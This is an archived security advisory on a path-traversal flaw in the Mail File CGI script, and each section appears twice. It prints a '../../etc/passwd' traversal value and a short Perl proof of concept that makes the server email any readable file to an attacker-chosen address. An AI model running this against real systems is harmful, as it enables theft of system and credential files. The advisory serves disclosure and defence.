MailFile Arbitrary File Disclosure Vulnerability
BID:1807
Info
MailFile Arbitrary File Disclosure Vulnerability
| Bugtraq ID: | 1807 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 11 2000 12:00AM |
| Updated: | Oct 11 2000 12:00AM |
| Credit: | First posted to Bugtraq by Dirk Brockhausen <[email protected]> on October 11, 2000. |
| Vulnerable: |
Oatmeal Studios Mail File 1.10 |
| Not Vulnerable: | |
Discussion
MailFile Arbitrary File Disclosure Vulnerability
OatMeal studios' Mail-File is a cgi application that allows for sending of certain files to user-specified email addresses via a web interface. A vulnerability exists in this script that can be used to send the contents of <i>any</i> readable user-specified files to an email address. When used normally, the web interface provides the user with the option to select files to send that have been pre-configured in the script. The values of the form variables associated with each "pre-configured file" are the actual filenames that are used when opening the files. As a result, the user can manipulate the filename value so that the script will, instead of opening one of the "normal" options, open whatever has been specified as the filename (eg "../../../../../../../../../etc/passwd"). The script also checks the value of the referrer when accepting submitted input from the form but fails to protect against this attack. If exploited, an attacker can read arbitrary files on the filesystem with the privileges of the webserver. This may lead to further compromise.
OatMeal studios' Mail-File is a cgi application that allows for sending of certain files to user-specified email addresses via a web interface. A vulnerability exists in this script that can be used to send the contents of <i>any</i> readable user-specified files to an email address. When used normally, the web interface provides the user with the option to select files to send that have been pre-configured in the script. The values of the form variables associated with each "pre-configured file" are the actual filenames that are used when opening the files. As a result, the user can manipulate the filename value so that the script will, instead of opening one of the "normal" options, open whatever has been specified as the filename (eg "../../../../../../../../../etc/passwd"). The script also checks the value of the referrer when accepting submitted input from the form but fails to protect against this attack. If exploited, an attacker can read arbitrary files on the filesystem with the privileges of the webserver. This may lead to further compromise.
Exploit / POC
MailFile Arbitrary File Disclosure Vulnerability
This small exploit was included in the post to Bugtraq by Dirk Brockhausen <[email protected]>:
--snip--
#!/usr/bin/perl
use HTTP::Request::Common;
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
$res = $ua->request(POST 'http://domain/mailfile.cgi',
[real_name => 'value1',
email => 'value2',
filename => 'value3',
]);
--snip--
value3 = target filename
value2 = where to send the file to
value1 = username.. can be anything.
This small exploit was included in the post to Bugtraq by Dirk Brockhausen <[email protected]>:
--snip--
#!/usr/bin/perl
use HTTP::Request::Common;
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
$res = $ua->request(POST 'http://domain/mailfile.cgi',
[real_name => 'value1',
email => 'value2',
filename => 'value3',
]);
--snip--
value3 = target filename
value2 = where to send the file to
value1 = username.. can be anything.
Solution / Fix
MailFile Arbitrary File Disclosure Vulnerability
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].